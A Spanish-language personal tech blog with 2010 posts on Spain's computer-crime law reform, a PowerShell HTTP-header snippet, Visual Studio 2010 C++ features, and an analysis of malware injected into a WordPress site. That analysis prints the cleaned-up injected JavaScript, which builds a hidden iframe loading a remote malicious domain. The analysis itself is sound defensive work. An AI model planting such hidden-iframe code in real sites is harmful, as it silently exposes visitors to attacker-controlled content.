viernes, 24 de diciembre de 2010

Ha entrado en vigor la nueva reforma del Código Penal en España

En lo referente a la informática se incluyen como conductas punibles borrar, dañar, deteriorar, alterar, suprimir o hacer inaccesibles datos o programas informáticos ajenos y el acceso sin autorización a datos o programas contenidos en un sistema informático.

Esperemos que a partir de ahora algunos se lo piensen dos veces antes de ponerse a enredar donde no deben.

Para mas información:

Yahoo noticias
Aranzadi

sábado, 30 de octubre de 2010

ladenas938 en Wordpress (Script Redirector)

Recientemente han caído en mis manos unos archivos .PHP pertenecientes a un blog basado en "Wordpress". Estos archivos habían sido alterados insertando código malicioso escrito en JavaScript ofuscado para dificultar su interpretación.

Inicialmente el atacante ha infectado todos los archivos de código del blog insertando tanto al comienzo de los mismos como al final, una o varias líneas de código javascript con una longitud de unos 1800 caracteres.

Así que como tenía un rato libre me dije, a ver de qué va este pedacito de código…

El primer paso ha sido tabular el código de forma adecuada para facilitar su lectura, con lo cual han quedado unas 130 líneas de código. A continuación he realizado una primera pasada de limpieza del código eliminando todo el código inservible utilizado para la ofuscación y, finalmente con el "código bueno" entre las manos, cuya longitud era de 13 líneas de código útil se podía ver perfectamente las primeras intenciones.

Han utilizado "codificado de cadenas de texto" para dificultar su lectura, control de excepciones para realizar varios reintentos de carga de una web remota ( www [dot] ladenas938 [dot] com ), la cual era cargada en un IFRAME oculto y creado desde el propio script anexándolo al BODY del blog.

En un fin otro juguete más con el que andan enredando los del lado oscuro ¡qué le vamos a hacer!
En cualquier caso para los que queráis verlo, aquí os dejo el código limpio del script (la parte TRY):

var c = 120;
var u = "body";
var x = String( "appendChild" );
var xE = document;
var f = String("iframe");
var uS = "createElement";
var g = xE[uS](f);
var cA = String("visibility");
g.height = c;
g.width = c;
g.src = String("http://www.ladenas938.com/users/5");
g.style[cA] = "hidden";
xE[u][x](g);

miércoles, 23 de junio de 2010

Using PowerShell to get the HTTP HEADER values

All you need to do is open a powershell session and write the following code:

$url =
http://www.manuelvillasur.com/;
$httpRequest = [System.Net.HttpWebRequest]::Create($url);
$response = $httpRequest.GetResponse();
$response.Headers.ToString();

domingo, 2 de mayo de 2010

Las nuevas características de C++ y MFC en Visual Studio 2010

Visual Studio 2010 nos ofrece nuevas características y grandes mejoras que harán las delicias de todos los profesionales dedicados a la creación de soluciones informáticas. Personalmente he podido probar diversas de estas características en varias áreas y tecnologías (herramientas relacionadas con la arquitectura de software, como son las gráficas de capas, de secuencia, de dependencias, la validación de arquitecturas, las mejoras en ALM, algunas de las características del nuevo framework .net 4, el gestor de código fuente, etc).

Desde que saliera la primera versión beta (allá por Mayo de 2009), posteriormente en la Beta 2 (Octubre de 2009), la RC (Release Candidate) y finalmente la RTM (Release To Manufacturing), no he dejado de asombrarme. Para los que queráis saber un poco más sobre el tema, recomiendo echar un vistazo a los videos de la PDC 2009 (microsoftpdc.com) y al MIX 2010 (live.visitmix.com) y por supuesto en la propia web de Visual Studio o MSDN.

De todas formas no quiero extenderme con las grandezas del nuevo Visual Studio 2010, sino más bien centrarme en lo que a C++ y MFC (Microsoft Foundation Classes) se refiere. Tan solo unas breves pinceladas a lo que nos encontraremos si vamos a crear un proyecto en C++:

  • Ya sabemos que el nuevo estándar de C++ (C++0x) está a la vuelta de la esquina y en este sentido, el compilador ya viene con soporte para la gran mayoría de las nuevas características (expresiones lambda, un cambio en la keyword auto, null pointers, referencias rvalue, static_assert, decltype, etc).
  • Mejoras en la librería estándar, la cual ha sido reescrita en gran parte para aprovechar las ventajas que ofrece el nuevo estándar (make_shared, unique_ptr, etc)
  • Nuevas funciones miembro (cbegin y cend) para movernos mejor en los contenedores.
  • Algo que personalmente me encanta son las mejoras en cuanto a programación concurrente, la forma de crear nuevos grupos o hilos de ejecución es asombrosamente potente y sencilla. Nos encontramos con el motor de la programación concurrente ConcRT (Concurrency Runtime), la librería de programación paralela PPL (Parallel Programming Library) la cual nos proporciona diversas clases, algoritmos, contenedores y mecanismos de sincronización que nos facilitan el trabajo (task_handle, task_group, structured_task_group, parallel_invoke, parallel_for, parallel_for_each, concurrent_queue, concurrent_vector, critical_section, reader_writer_lock, etc)
  • Grandes mejoras en IntelliSense (por ejemplo al teclear #include <), muestra la lista de librerías disponibles.
  • MSBuild para C++ con posibilidad de configuración mediante ficheros XML.
  • Compilación más rápida
  • Se ha mejorado MFC con nuevas clases para dar soporte al desarrollo de aplicaciones en Windows 7.
  • Por fin, podemos configurar la RibbonBar desde el editor de recursos, ya no será necesario picar el código de construcción de la barra.
  • El retorno de MFC Class Wizard, realmente nos facilitará la creación de nuevas clases, ya que tendremos acceso a comandos, mensajes, funciones virtuales, variables miembro y métodos. Añadir clases de MFC, desde TypeLib, desde un control ActiveX y ODBC.

Probablemente me deje cosas en el tintero, pero creo que las más importantes relacionadas con C++ están reflejadas. Poco a poco intentaré subir algo de código de demostración de las diferentes “Features”.